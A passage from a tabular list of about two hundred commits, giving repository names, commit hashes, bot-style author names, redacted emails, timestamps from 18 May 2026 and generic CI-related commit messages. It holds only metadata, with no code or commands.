| 1179 | Taher-10/cour | 35935e766b8f | ci-bot | [email protected] | 2026-05-18T12:15:35.000Z | chore: sync ci configuration |
| 1180 | umugabodev/MIS | 3596c0845ccc | pipeline-bot | [email protected] | 2026-05-18T13:17:54.000Z | build: improve ci performance |
| 1181 | gcDiego/domipay-hackathon2025 | 359c5c0ec2d3 | ci-bot | [email protected] | 2026-05-18T13:52:18.000Z | ci: update build config |
| 1182 | alexmagwe/store-api | 35cb70fcba76 | auto-ci | [email protected] | 2026-05-18T13:03:55.000Z | chore: update ci/cd pipeline |
| 1183 | moinkhaneddtr-cloud/wifuu-website | 35cebffb6a87 | ci-bot | [email protected] | 2026-05-18T16:16:35.000Z | chore: update ci/cd pipeline |
| 1184 | lucky-hw-kim/FOCAL | 35d34ffc43cd | pipeline-bot | [email protected] | 2026-05-18T12:44:19.000Z | chore: sync ci configuration |
| 1185 | umakantmukhiya/test-action-1778960691676071648 | 35d86a86b263 | auto-ci | [email protected] | 2026-05-18T15:41:43.000Z | ci: add build optimization step |
| 1186 | dmwm/cms-htcondor-es | 35e9b3eda415 | build-bot | [email protected] | 2026-05-18T13:50:40.000Z | ci: update build config |
| 1187 | Debbatisudheer/Neural-Network-guid | 35ea54452054 | build-bot | [email protected] | 2026-05-18T17:24:07.000Z | ci: update build config |
| 1188 | naytanvieira/idpb-novo | 35f643f25d04 | pipeline-bot | [email protected] | 2026-05-18T15:13:03.000Z | build: improve ci performance |
| 1189 | isaac372/ArduinoNoderReact | 35ff1d6c9909 | build-bot | [email protected] | 2026-05-18T13:04:20.000Z | ci: add build optimization step |
| 1190 | sbs24013/git_test | 36068f41fd50 | build-bot | [email protected] | 2026-05-18T16:12:17.000Z | fix: correct build workflow |
| 1191 | the-oracle-keeps-the-human-human/delta-oracle | 36090258483a | ci-bot | [email protected] | 2026-05-18T13:39:43.000Z | chore: optimize pipeline runtime |
| 1192 | Harshit2510745/Chat-Application-MERN | 361096641830 | pipeline-bot | [email protected] | 2026-05-18T12:58:17.000Z | ci: update build config |
| 1193 | Ediekkhan/EcommerceCentral | 36161598850a | pipeline-bot | [email protected] | 2026-05-18T13:43:41.000Z | ci: update build config |
| 1194 | Piyush-Bansal9/GDSC-Task | 361acc4366dc | pipeline-bot | [email protected] | 2026-05-18T12:08:37.000Z | chore: update ci/cd pipeline |
| 1195 | Ericooi997/Ericooi997.MyLoan-Guide | 36278d0e2e50 | pipeline-bot | [email protected] | 2026-05-18T13:02:03.000Z | chore: sync ci configuration |
| 1196 | justin0427/MessageBoard | 3631001f498d | auto-ci | [email protected] | 2026-05-18T13:10:02.000Z | build: improve ci performance |
| 1197 | bishaldahal4777/chatme | 36447e7a74dd | pipeline-bot | [email protected] | 2026-05-18T13:30:07.000Z | fix: correct build workflow |
| 1198 | ambevan/python-intermediate-inflammation | 364b0e34d019 | build-bot | [email protected] | 2026-05-18T15:41:49.000Z | ci: add build optimization step |
| 1199 | just-abdullah-dev/scad_project | 364b8192a261 | auto-ci | [email protected] | 2026-05-18T13:54:03.000Z | chore: optimize pipeline runtime |
| 1200 | guru03-coder/SkillNex | 364b9463cf0e | pipeline-bot | [email protected] | 2026-05-18T12:56:51.000Z | ci: add build optimization step |
| 1201 | zeroeints/Project-web-streaming | 364e9f62ef24 | pipeline-bot | [email protected] | 2026-05-18T12:42:39.000Z | build: improve ci performance |
| 1202 | thebenmerlin/budget-app | 36501b17c48a | auto-ci | [email protected] | 2026-05-18T12:18:12.000Z | chore: sync ci configuration |
| 1203 | MouadKH9/planning-poker | 3660e08765ae | ci-bot | [email protected] | 2026-05-18T13:03:31.000Z | chore: sync ci configuration |
| 1204 | dream77r/brewos-analytics-landing | 36669c27ef87 | ci-bot | [email protected] | 2026-05-18T17:15:25.000Z | ci: add build optimization step |
| 1205 | afomkina/spring-mvc-test | 366a95879dc2 | build-bot | [email protected] | 2026-05-18T13:50:44.000Z | build: improve ci performance |
| 1206 | ChristianJames-git/InstagramClone | 36766c7bd000 | pipeline-bot | [email protected] | 2026-05-18T15:23:09.000Z | ci: add build optimization step |
| 1207 | FedericoRubinstein/kalio_app_leg | 368b4b675d25 | ci-bot | [email protected] | 2026-05-18T12:08:48.000Z | chore: optimize pipeline runtime |
| 1208 | Denis10/diplome | 36ab442763ba | pipeline-bot | [email protected] | 2026-05-18T13:58:22.000Z | chore: update ci/cd pipeline |
| 1209 | pranto2051/Asif_Satarpara | 36ae2216ce60 | ci-bot | [email protected] | 2026-05-18T14:06:35.000Z | chore: update ci/cd pipeline |
| 1210 | Hatem-Haj-Ismail/test-action-1778997996655971955 | 36b2e7131d3f | ci-bot | [email protected] | 2026-05-18T12:01:55.000Z | chore: update ci/cd pipeline |
| 1211 | vrct07/halloween-website-design | 36bc67891fb0 | ci-bot | [email protected] | 2026-05-18T14:24:40.000Z | ci: add build optimization step |
| 1212 | AitorBermeRuiz/cSharp_Instituto | 36c3a9a5a2bd | build-bot | [email protected] | 2026-05-18T13:49:35.000Z | build: improve ci performance |
| 1213 | sj123r/first-website | 36c454af9720 | pipeline-bot | [email protected] | 2026-05-18T13:45:45.000Z | fix: correct build workflow |
| 1214 | jakhadakash/readme-4hrusg | 36c462f73c5c | pipeline-bot | [email protected] | 2026-05-18T14:56:33.000Z | build: improve ci performance |
| 1215 | TangWulin6/PlayTogether | 36df4793501d | pipeline-bot | [email protected] | 2026-05-18T13:14:23.000Z | ci: add build optimization step |
| 1216 | guru03-coder/GloboTrotter | 36e08efef282 | auto-ci | [email protected] | 2026-05-18T12:57:03.000Z | fix: correct build workflow |
| 1217 | Wanghley/ArgusView | 36e2ac9a6ab3 | auto-ci | [email protected] | 2026-05-18T14:24:34.000Z | chore: optimize pipeline runtime |
| 1218 | Oflu-Tekno/sources | 36e2e206aadd | build-bot | [email protected] | 2026-05-18T12:05:32.000Z | chore: optimize pipeline runtime |
| 1219 | Ashwiin/House-Sales-in-King-County-USA-Data-Analysis- | 36e6238ee04e | auto-ci | [email protected] | 2026-05-18T16:54:59.000Z | build: improve ci performance |
| 1220 | jongsun-park/CCT-ADA-Time-Series-Analysis | 36e85a4d3bc0 | auto-ci | [email protected] | 2026-05-18T16:15:14.000Z | ci: update build config |
| 1221 | maheshchonde89-ctrl/test-action-1778960008255150971 | 36ecf2074aca | ci-bot | [email protected] | 2026-05-18T12:49:08.000Z | fix: correct build workflow |
| 1222 | 10014Rebellion/2025-BottomFeeder-offseason | 36efbfbeab07 | build-bot | [email protected] | 2026-05-18T13:49:26.000Z | build: improve ci performance |
| 1223 | bishaldahal4777/trivenibanquet | 36f9a3ec7125 | ci-bot | [email protected] | 2026-05-18T13:33:02.000Z | chore: optimize pipeline runtime |
| 1224 | GiovanniMendoza1/test-action-1779116427629331792 | 3701f8f10fbd | build-bot | [email protected] | 2026-05-18T13:27:02.000Z | build: improve ci performance |
| 1225 | RuchirKadam1729/College | 3704eecb583c | build-bot | [email protected] | 2026-05-18T12:58:11.000Z | fix: correct build workflow |
| 1226 | iamhvsharma/GP-Backend | 37187928763b | auto-ci | [email protected] | 2026-05-18T16:34:47.000Z | fix: correct build workflow |
| 1227 | Orion0980/actividad2_grupal | 373e74ee6885 | pipeline-bot | [email protected] | 2026-05-18T16:28:16.000Z | build: improve ci performance |
| 1228 | vickysingh06/Asarfi_Marketing | 375031673147 | pipeline-bot | [email protected] | 2026-05-18T12:23:54.000Z | build: improve ci performance |
| 1229 | jenna-studio/jenna-studio | 375642b90ae6 | pipeline-bot | [email protected] | 2026-05-18T12:24:13.000Z | chore: sync ci configuration |
| 1230 | habib4445/Hotel-Menagement-System | 3761deee17ae | build-bot | [email protected] | 2026-05-18T16:09:02.000Z | fix: correct build workflow |
| 1231 | waheed3742/puter-web-app | 3772515989f4 | pipeline-bot | [email protected] | 2026-05-18T11:45:36.000Z | chore: optimize pipeline runtime |
| 1232 | b1kaf7/Numerical-Methods | 37728b187d68 | auto-ci | [email protected] | 2026-05-18T15:28:51.000Z | ci: add build optimization step |
| 1233 | Vincent222372/AndroidGroup03 | 3792297ff756 | ci-bot | [email protected] | 2026-05-18T16:15:46.000Z | chore: sync ci configuration |
| 1234 | nehal-0407/Compilee_lab | 379414941e0e | auto-ci | [email protected] | 2026-05-18T16:09:32.000Z | build: improve ci performance |
| 1235 | dmwm/WMCore-Jenkins | 379601a5e519 | pipeline-bot | [email protected] | 2026-05-18T13:51:41.000Z | chore: sync ci configuration |
| 1236 | saradune6/News-Reporter-AI-Agent-Using-CrewAI | 379ef89a20e5 | auto-ci | [email protected] | 2026-05-18T13:01:40.000Z | fix: correct build workflow |
| 1237 | zarvish/manifestaci-n | 37aa903d7ddc | auto-ci | [email protected] | 2026-05-18T12:24:36.000Z | build: improve ci performance |
| 1238 | kritikhatri/Photography-Showcase | 37b1fb63fb28 | ci-bot | [email protected] | 2026-05-18T15:36:18.000Z | ci: update build config |
| 1239 | Lhagvaa0102/Crud | 37bb5c85d382 | build-bot | [email protected] | 2026-05-18T16:04:24.000Z | fix: correct build workflow |
| 1240 | jenish-prog/Laxa | 37d2e375ad1c | auto-ci | [email protected] | 2026-05-18T14:01:41.000Z | chore: update ci/cd pipeline |
| 1241 | noushiFlex/monBlog | 37efe31bbde5 | pipeline-bot | [email protected] | 2026-05-18T17:40:41.000Z | chore: sync ci configuration |
| 1242 | phutt-bwai/docs | 37f157b9e180 | auto-ci | [email protected] | 2026-05-18T12:22:48.000Z | chore: sync ci configuration |
| 1243 | tutututurbo/PoliSonic-Creations | 37f382f1a113 | ci-bot | [email protected] | 2026-05-18T16:11:57.000Z | chore: update ci/cd pipeline |
| 1244 | ZunsodB/Spotify-Backend | 37f55b0395d0 | pipeline-bot | [email protected] | 2026-05-18T16:25:08.000Z | ci: update build config |
| 1245 | junaidirshad098/junaidirshad098 | 380daa1890d5 | pipeline-bot | [email protected] | 2026-05-18T13:12:07.000Z | ci: add build optimization step |
| 1246 | Thang2905/PBL2 | 380e6c7f55bd | build-bot | [email protected] | 2026-05-18T15:48:08.000Z | fix: correct build workflow |
| 1247 | Godpixelthereal/biograph-ai | 3814714a3dec | auto-ci | [email protected] | 2026-05-18T14:07:47.000Z | chore: sync ci configuration |
| 1248 | thanu-george/QRcode-builder | 3838347f0e04 | pipeline-bot | [email protected] | 2026-05-18T13:02:14.000Z | build: improve ci performance |
| 1249 | arhen/pulse-log-viewer | 383970b704eb | pipeline-bot | [email protected] | 2026-05-18T14:07:09.000Z | fix: correct build workflow |
| 1250 | deploy11/3-makab-website | 385d68c73d30 | pipeline-bot | [email protected] | 2026-05-18T11:53:21.000Z | build: improve ci performance |
| 1251 | junaidirshad098/uv-assignments | 386bebd0fd0e | pipeline-bot | [email protected] | 2026-05-18T13:11:51.000Z | chore: sync ci configuration |
| 1252 | Akisan98/Code | 3891e96a6e20 | pipeline-bot | [email protected] | 2026-05-18T14:07:22.000Z | fix: correct build workflow |
| 1253 | CHESSComputing/BeamPass | 3892229aa5d5 | ci-bot | [email protected] | 2026-05-18T13:37:17.000Z | fix: correct build workflow |
| 1254 | isaac372/AppKilometrajeReactNative | 389d070397d2 | build-bot | [email protected] | 2026-05-18T13:02:20.000Z | build: improve ci performance |
| 1255 | arpita009/findingfalconeReactRedux | 38ab828aa64b | auto-ci | [email protected] | 2026-05-18T16:35:25.000Z | ci: add build optimization step |
| 1256 | Prajwal247/NextJs-Form-handling | 38af2790fa02 | ci-bot | [email protected] | 2026-05-18T13:11:59.000Z | chore: optimize pipeline runtime |
| 1257 | RameshRukshan/PicNCharge | 38b43f0d3a3a | ci-bot | [email protected] | 2026-05-18T17:29:13.000Z | fix: correct build workflow |
| 1258 | just-abdullah-dev/scad_lab7 | 38bc11cf2b6b | build-bot | [email protected] | 2026-05-18T13:55:00.000Z | ci: update build config |
| 1259 | JKS-sys/Short-Blog-s-Backend | 38be370afdf5 | pipeline-bot | [email protected] | 2026-05-18T14:27:37.000Z | fix: correct build workflow |
| 1260 | MTGrubbs/test-action-1779119165309268084 | 38c80606a550 | build-bot | [email protected] | 2026-05-18T13:54:58.000Z | chore: update ci/cd pipeline |
| 1261 | kayosama007/ci-build-0042 | 38d2c2606072 | build-bot | [email protected] | 2026-05-18T14:26:36.000Z | fix: correct build workflow |
| 1262 | ibrahiemhss/WebViewTask | 38dbdbbd8a9c | build-bot | [email protected] | 2026-05-18T14:06:28.000Z | ci: update build config |
| 1263 | Explore-AI/Pictures | 38e0c571f6cb | build-bot | [email protected] | 2026-05-18T12:41:24.000Z | chore: sync ci configuration |
| 1264 | lucky-hw-kim/graphQL-Tutorial | 38e6e73ed62c | pipeline-bot | [email protected] | 2026-05-18T12:41:37.000Z | fix: correct build workflow |
| 1265 | ChanceDevelopment/beautyContest | 38fcb0666c63 | pipeline-bot | [email protected] | 2026-05-18T12:43:48.000Z | chore: update ci/cd pipeline |
| 1266 | EnamulBokshi/ph-blog-app-client | 390a35b61de8 | pipeline-bot | [email protected] | 2026-05-18T15:29:59.000Z | chore: optimize pipeline runtime |
| 1267 | MaybeBroken/UI-Craft | 3913c7b485e3 | auto-ci | [email protected] | 2026-05-18T17:05:58.000Z | chore: update ci/cd pipeline |
| 1268 | Husam-AbuZina/Docker_GSG | 391566f5d0e7 | build-bot | [email protected] | 2026-05-18T12:26:44.000Z | chore: sync ci configuration |
| 1269 | gioeste/polyboynfts | 3917b10e9867 | auto-ci | [email protected] | 2026-05-18T13:04:53.000Z | chore: update ci/cd pipeline |
| 1270 | SahilVGite/Do_Hotels | 39261704e87f | pipeline-bot | [email protected] | 2026-05-18T12:20:27.000Z | ci: add build optimization step |
| 1271 | AmarKumarShaw/lama_blog_1st_part | 392c68365501 | ci-bot | [email protected] | 2026-05-18T12:16:48.000Z | ci: update build config |
| 1272 | abhinavhello/test-action-1778957508072385386 | 3935594d70b4 | ci-bot | [email protected] | 2026-05-18T12:05:14.000Z | chore: optimize pipeline runtime |
| 1273 | Warshaman/build-pipeline-140 | 39363dfa760a | pipeline-bot | [email protected] | 2026-05-18T11:40:27.000Z | chore: update ci/cd pipeline |
| 1274 | elmizan/FootBallLemon | 394f7d4029b8 | auto-ci | [email protected] | 2026-05-18T11:46:23.000Z | build: improve ci performance |
| 1275 | akhill4054/django_complaint_registration_webapp | 394f9c0f276d | build-bot | [email protected] | 2026-05-18T16:35:10.000Z | chore: optimize pipeline runtime |
| 1276 | Marshall-Hu/Pra_MuiltSelectTable | 395cb5506093 | ci-bot | [email protected] | 2026-05-18T13:54:59.000Z | chore: optimize pipeline runtime |
| 1277 | aj-techsoul/ELECTRON-4-PHP | 395dcc34e0b4 | ci-bot | [email protected] | 2026-05-18T13:45:19.000Z | ci: add build optimization step |
| 1278 | Len-168/Near-Us | 3970e736524a | auto-ci | [email protected] | 2026-05-18T13:15:59.000Z | chore: optimize pipeline runtime |
| 1279 | foreiner/dinoRun | 3981b138778a | auto-ci | [email protected] | 2026-05-18T12:01:21.000Z | chore: sync ci configuration |
| 1280 | Sigam90/MCMALI-TV | 3995d15dfde1 | build-bot | [email protected] | 2026-05-18T13:41:35.000Z | fix: correct build workflow |
| 1281 | EnamulBokshi/ABC-Group | 399790f7bf53 | pipeline-bot | [email protected] | 2026-05-18T15:35:26.000Z | chore: update ci/cd pipeline |
| 1282 | ShaileshS237/loveAkot | 399b434cf880 | ci-bot | [email protected] | 2026-05-18T17:01:21.000Z | ci: update build config |
| 1283 | Wang200935/guowen-report | 399b512027aa | ci-bot | [email protected] | 2026-05-18T13:25:50.000Z | chore: optimize pipeline runtime |
| 1284 | RUN-TECH-SPACE/runtechspace-new-site | 399efe04b054 | pipeline-bot | [email protected] | 2026-05-18T17:37:54.000Z | build: improve ci performance |
| 1285 | NMA2019/chat-lan | 39a63b997ff2 | pipeline-bot | [email protected] | 2026-05-18T12:09:09.000Z | chore: optimize pipeline runtime |
| 1286 | elenecu/github-webhooks | 39a6c14f9503 | pipeline-bot | [email protected] | 2026-05-18T16:08:02.000Z | fix: correct build workflow |
| 1287 | CreativeMasterBonin/thingamajigs-forge | 39afc879c43f | build-bot | [email protected] | 2026-05-18T14:05:28.000Z | chore: update ci/cd pipeline |
| 1288 | Online-Shop-Backend/Backend | 39c441e1571a | ci-bot | [email protected] | 2026-05-18T13:06:42.000Z | build: improve ci performance |
| 1289 | andersonphiri/golang-leftpad | 39ca034963e0 | pipeline-bot | [email protected] | 2026-05-18T13:56:28.000Z | chore: sync ci configuration |
| 1290 | ikikikyouth/ssvpbd | 39db6ad34c1c | auto-ci | [email protected] | 2026-05-18T14:01:34.000Z | ci: add build optimization step |
| 1291 | mesahub-db/mesahub-ui | 39dfe67a851e | build-bot | [email protected] | 2026-05-18T13:58:19.000Z | chore: update ci/cd pipeline |
| 1292 | bishaldahal4777/test-action-1779100116835068135 | 39e1f130e568 | build-bot | [email protected] | 2026-05-18T13:27:44.000Z | chore: optimize pipeline runtime |
| 1293 | varunvaghasiya11/Java_script_project | 39f18adbe562 | auto-ci | [email protected] | 2026-05-18T14:00:01.000Z | ci: update build config |
| 1294 | RobertLlb/projeto-mysql-manager | 39fe8c263978 | ci-bot | [email protected] | 2026-05-18T14:33:15.000Z | ci: update build config |
| 1295 | NITHIN-NT/youtubeclone | 3a03568965d3 | pipeline-bot | [email protected] | 2026-05-18T13:25:59.000Z | ci: add build optimization step |
| 1296 | sahidDev09/sahidDev09 | 3a0a819a46ea | auto-ci | [email protected] | 2026-05-18T16:06:18.000Z | chore: optimize pipeline runtime |
| 1297 | mahbubur1rahman/test-action-1778960691731647561 | 3a1d998993cb | build-bot | [email protected] | 2026-05-18T16:35:06.000Z | fix: correct build workflow |
| 1298 | Adnanhhk/build-pipeline-405 | 3a218d020a90 | build-bot | [email protected] | 2026-05-18T15:12:11.000Z | build: improve ci performance |
| 1299 | SaiDheeraj-19/DR.C.Ranjeeth-Kumar | 3a353e755c60 | pipeline-bot | [email protected] | 2026-05-18T15:50:10.000Z | ci: add build optimization step |
| 1300 | Dyybyy/edwwedxwe | 3a3ef52ff94a | build-bot | [email protected] | 2026-05-18T13:25:42.000Z | fix: correct build workflow |
| 1301 | jaff0040/Portfolio-model | 3a4347179326 | pipeline-bot | [email protected] | 2026-05-18T17:36:32.000Z | build: improve ci performance |
| 1302 | Asultop/AsulLang-Dev | 3a45de727f5d | pipeline-bot | [email protected] | 2026-05-18T12:23:47.000Z | chore: sync ci configuration |
| 1303 | junaidirshad098/flutter | 3a4890815339 | build-bot | [email protected] | 2026-05-18T13:16:40.000Z | fix: correct build workflow |
| 1304 | praktikum-java/module2_catsgram | 3a587c08ee57 | pipeline-bot | [email protected] | 2026-05-18T13:51:16.000Z | build: improve ci performance |
| 1305 | CodeBy-Raj/honeypot-agent-ai | 3a641c0633c7 | pipeline-bot | [email protected] | 2026-05-18T12:35:24.000Z | fix: correct build workflow |
| 1306 | ho-cyber/STEAM-clubs-web | 3a776f890a48 | ci-bot | [email protected] | 2026-05-18T17:33:41.000Z | ci: add build optimization step |
| 1307 | ZunsodB/Proshop-backend | 3a7af1a939af | pipeline-bot | [email protected] | 2026-05-18T16:24:59.000Z | chore: optimize pipeline runtime |
| 1308 | walasee/docker-projects-rentzone | 3a9ad3d93ba6 | ci-bot | [email protected] | 2026-05-18T16:04:54.000Z | build: improve ci performance |
| 1309 | amitos80/baseui-table-builder | 3aa52034310b | ci-bot | [email protected] | 2026-05-18T13:52:52.000Z | ci: add build optimization step |
| 1310 | Theonimfi/Foundations-of-AI-Assignments | 3aa886aefe9d | ci-bot | [email protected] | 2026-05-18T12:36:26.000Z | ci: add build optimization step |
| 1311 | deploy11/myishuz | 3aae99cdc67f | ci-bot | [email protected] | 2026-05-18T11:53:42.000Z | fix: correct build workflow |
| 1312 | 0xdps/buildtool | 3ac0091276a4 | pipeline-bot | [email protected] | 2026-05-18T14:03:22.000Z | chore: sync ci configuration |
| 1313 | yashlad27/test-action-1779100546531077204 | 3ac2360569cf | auto-ci | [email protected] | 2026-05-18T13:14:37.000Z | ci: update build config |
| 1314 | B-andir/DiceWBot | 3b0cec29e410 | auto-ci | [email protected] | 2026-05-18T16:59:59.000Z | chore: sync ci configuration |
| 1315 | kirankhadka9/Patan-frontend | 3b165ec7674c | auto-ci | [email protected] | 2026-05-18T16:39:08.000Z | ci: add build optimization step |
| 1316 | jenish-prog/Affiliate_marketing | 3b1fb20f7a5d | pipeline-bot | [email protected] | 2026-05-18T14:01:05.000Z | ci: add build optimization step |
| 1317 | ho-cyber/auto-board_game | 3b224c968bbb | build-bot | [email protected] | 2026-05-18T17:24:22.000Z | build: improve ci performance |
| 1318 | Bekir-Caglar/Qarko | 3b269b928b5a | pipeline-bot | [email protected] | 2026-05-18T13:13:28.000Z | chore: sync ci configuration |
| 1319 | Koerperfluss/koerperfluss-edu-integrity-layer | 3b2b97c627fb | build-bot | [email protected] | 2026-05-18T12:23:21.000Z | chore: optimize pipeline runtime |
| 1320 | DenysOleksiuk/app | 3b3123b0ca5b | auto-ci | [email protected] | 2026-05-18T16:19:18.000Z | build: improve ci performance |
| 1321 | anshvarma07/oibsip_taskno3 | 3b3346d9547f | build-bot | [email protected] | 2026-05-18T13:40:50.000Z | chore: optimize pipeline runtime |
| 1322 | ele-spano22/0crumbs | 3b4011303427 | ci-bot | [email protected] | 2026-05-18T14:09:40.000Z | fix: correct build workflow |
| 1323 | KryptonZQ/EINSTEINSCHOOL | 3b531d79ab42 | build-bot | [email protected] | 2026-05-18T12:51:14.000Z | ci: add build optimization step |
| 1324 | prajwolacharyaa/DSA-with-C | 3b5c72e97dcf | pipeline-bot | [email protected] | 2026-05-18T13:25:15.000Z | chore: sync ci configuration |
| 1325 | newszeng/crontab | 3b6bdd15d152 | build-bot | [email protected] | 2026-05-18T14:21:12.000Z | chore: update ci/cd pipeline |
| 1326 | Debbatisudheer/Gradient-Descent-loss-alg- | 3b74d70d5576 | build-bot | [email protected] | 2026-05-18T17:40:08.000Z | chore: sync ci configuration |
| 1327 | MTGrubbs/test-action-1779100116749643649 | 3b82319abbbe | auto-ci | [email protected] | 2026-05-18T13:55:09.000Z | chore: sync ci configuration |
| 1328 | MouadKH9/darna | 3b860649be77 | build-bot | [email protected] | 2026-05-18T13:01:57.000Z | chore: update ci/cd pipeline |
| 1329 | vansh7266/ContextBridge | 3b9126a89d46 | auto-ci | [email protected] | 2026-05-18T16:50:32.000Z | ci: add build optimization step |
| 1330 | Grzzmine/test-action-1779100876921319548 | 3b987a87390d | auto-ci | [email protected] | 2026-05-18T12:01:03.000Z | ci: update build config |
| 1331 | saksham-tech/Chat-App-Backend-server | 3ba0f7322697 | pipeline-bot | [email protected] | 2026-05-18T17:08:31.000Z | ci: add build optimization step |
| 1332 | sousasantos/car-wash | 3bc295df9804 | auto-ci | [email protected] | 2026-05-18T14:15:07.000Z | fix: correct build workflow |
| 1333 | lakers07/Sales-Analysis-Linear-Regression | 3bc8bf39e5a1 | auto-ci | [email protected] | 2026-05-18T13:39:49.000Z | chore: optimize pipeline runtime |
| 1334 | smallziz18/nodebase | 3bdb7ef97b2d | pipeline-bot | [email protected] | 2026-05-18T12:05:33.000Z | chore: sync ci configuration |
| 1335 | just-abdullah-dev/scad_lab10 | 3c0d1aa7c054 | build-bot | [email protected] | 2026-05-18T13:54:26.000Z | build: improve ci performance |
| 1336 | Exp-Intro-to-GitHub-Flow-Cohort-1/series-intro-to-github-flow-prasiddhp10 | 3c23c4b3abac | pipeline-bot | [email protected] | 2026-05-18T12:40:09.000Z | ci: add build optimization step |
| 1337 | Husam-AbuZina/Habits-one-habit-at-a-time.backend | 3c2d4ffdbbe9 | auto-ci | [email protected] | 2026-05-18T12:15:17.000Z | build: improve ci performance |
| 1338 | loaykhalifa/firefox-oneline-MAC | 3c3ec1de00cb | build-bot | [email protected] | 2026-05-18T13:47:31.000Z | chore: update ci/cd pipeline |
| 1339 | gokul-227/gokul-227 | 3c3f4ba1c225 | pipeline-bot | [email protected] | 2026-05-18T16:18:56.000Z | ci: add build optimization step |
| 1340 | sahidDev09/UrbanIQ-real-state | 3c43056dc040 | auto-ci | [email protected] | 2026-05-18T16:11:10.000Z | fix: correct build workflow |
| 1341 | bishaldahal4777/first-django-project | 3c4cc1e3a94e | auto-ci | [email protected] | 2026-05-18T13:32:53.000Z | ci: update build config |
| 1342 | RuchirKadam1729/devops-miniproj-devgordon | 3c5768cee9a1 | ci-bot | [email protected] | 2026-05-18T12:56:14.000Z | chore: sync ci configuration |
| 1343 | omondijeff/gitops-inception | 3c637417b680 | auto-ci | [email protected] | 2026-05-18T13:08:39.000Z | ci: update build config |
| 1344 | Mostakim0978/Mostakim0978 | 3c6953352c2e | auto-ci | [email protected] | 2026-05-18T11:47:32.000Z | chore: update ci/cd pipeline |
| 1345 | Anthony-Mwangi-DQ/test-action-1778960691713417115 | 3c821ad0cf9a | ci-bot | [email protected] | 2026-05-18T13:32:52.000Z | chore: optimize pipeline runtime |
| 1346 | pranto2051/This-is-my-first-Progect | 3c8f278fd533 | ci-bot | [email protected] | 2026-05-18T14:16:41.000Z | ci: add build optimization step |
| 1347 | danhoernchen/odin-rock-paper-scissors | 3c9ded312ad3 | pipeline-bot | [email protected] | 2026-05-18T13:56:02.000Z | ci: add build optimization step |
| 1348 | vkuznet/extractor | 3cb6951ec374 | ci-bot | [email protected] | 2026-05-18T13:49:06.000Z | ci: add build optimization step |
| 1349 | kayosama007/ci-build-0045 | 3cbd9e8c36da | build-bot | [email protected] | 2026-05-18T14:26:25.000Z | chore: sync ci configuration |
| 1350 | deploy11/ekutubxon2 | 3cbdd27e2225 | auto-ci | [email protected] | 2026-05-18T11:51:17.000Z | fix: correct build workflow |
| 1351 | tuantrinitri/bull-headed-kid | 3ce1beab4f6d | build-bot | [email protected] | 2026-05-18T16:26:28.000Z | ci: add build optimization step |
| 1352 | andersonphiri/akka-streams-practice | 3ce47d54a292 | ci-bot | [email protected] | 2026-05-18T13:53:40.000Z | ci: add build optimization step |
| 1353 | MoustafaElsaghier/MedicineWarehouse | 3cf263a82bab | pipeline-bot | [email protected] | 2026-05-18T15:40:07.000Z | ci: add build optimization step |
| 1354 | Richonn/SBOMForge | 3cf5501d01a0 | build-bot | [email protected] | 2026-05-18T14:01:13.000Z | ci: update build config |
| 1355 | smarterrevolutionai/smarterrevolution-infrastructure | 3cfd7a5eb940 | pipeline-bot | [email protected] | 2026-05-18T15:10:04.000Z | chore: sync ci configuration |
| 1356 | arj1211/CCC_PyPractice | 3d05b8125610 | auto-ci | [email protected] | 2026-05-18T15:53:39.000Z | ci: add build optimization step |
| 1357 | Jenithion-School/CS30 | 3d1ad85c45e5 | build-bot | [email protected] | 2026-05-18T13:48:40.000Z | chore: update ci/cd pipeline |
| 1358 | BharatKeCoders/Innovative-backend | 3d448bde9bbf | build-bot | [email protected] | 2026-05-18T12:15:32.000Z | build: improve ci performance |
| 1359 | Hatem-Haj-Ismail/test-action-1778957958974845109 | 3d536a1737c9 | ci-bot | [email protected] | 2026-05-18T12:05:42.000Z | build: improve ci performance |
| 1360 | Debbatisudheer/ML-AI-DL | 3d7e12c5786f | build-bot | [email protected] | 2026-05-18T17:23:41.000Z | fix: correct build workflow |
| 1361 | Gaucho-Rocket-Project/TellurisLandingSimulation | 3d803581ede8 | ci-bot | [email protected] | 2026-05-18T13:06:29.000Z | fix: correct build workflow |
| 1362 | 065Alya/Kelompok-6_2024C_Veil-Sight-Fragments-of-Fate | 3d915b38747a | ci-bot | [email protected] | 2026-05-18T14:07:11.000Z | chore: update ci/cd pipeline |
| 1363 | andrewillian/musicsite | 3d967b048773 | build-bot | [email protected] | 2026-05-18T16:21:03.000Z | ci: add build optimization step |
| 1364 | osamahkenawy/osamahkenawy | 3d9ce566cae6 | pipeline-bot | [email protected] | 2026-05-18T15:11:12.000Z | chore: optimize pipeline runtime |
| 1365 | moinkhaneddtr-cloud/wifuu- | 3d9d346da299 | auto-ci | [email protected] | 2026-05-18T16:16:04.000Z | build: improve ci performance |
| 1366 | ammadey7/nishaal-os-worksheet-1 | 3daad161b86e | build-bot | [email protected] | 2026-05-18T13:13:39.000Z | chore: optimize pipeline runtime |
| 1367 | BryanAlexanderSantoso/ML-Prediksi-Gempa-Indonesia | 3dac18dc5fca | build-bot | [email protected] | 2026-05-18T13:40:52.000Z | ci: update build config |
| 1368 | ZunsodB/test-action-1779100116870789994 | 3dbe115fd236 | auto-ci | [email protected] | 2026-05-18T16:21:09.000Z | chore: optimize pipeline runtime |
| 1369 | Zawad838/Shihot-Dynamic | 3dc27eac701a | auto-ci | [email protected] | 2026-05-18T16:30:14.000Z | chore: optimize pipeline runtime |
| 1370 | haseeeb-git/hamza_portfolio | 3dcb5c95ded8 | build-bot | [email protected] | 2026-05-18T11:56:30.000Z | chore: sync ci configuration |
| 1371 | Debbatisudheer/Queue | 3dcd18639944 | ci-bot | [email protected] | 2026-05-18T17:38:31.000Z | fix: correct build workflow |
| 1372 | arj1211/scala-99 | 3dcd75f2e060 | ci-bot | [email protected] | 2026-05-18T15:40:19.000Z | ci: update build config |
| 1373 | osamahkenawy/shoppingPhone | 3dd9a7544eab | auto-ci | [email protected] | 2026-05-18T15:14:08.000Z | chore: update ci/cd pipeline |
| 1374 | duynk49/aws-information | 3df40234fe8c | build-bot | [email protected] | 2026-05-18T16:32:25.000Z | ci: add build optimization step |
| 1375 | arpita009/csv_parser | 3e142546ed92 | pipeline-bot | [email protected] | 2026-05-18T16:35:35.000Z | chore: sync ci configuration |
| 1376 | BryanAlexanderSantoso/ppt-bk | 3e1649502f1a | pipeline-bot | [email protected] | 2026-05-18T13:51:47.000Z | chore: sync ci configuration |
| 1377 | HarshAgnihotri9/test-action-1778959304202428781 | 3e245bab5254 | auto-ci | [email protected] | 2026-05-18T12:10:30.000Z | fix: correct build workflow |
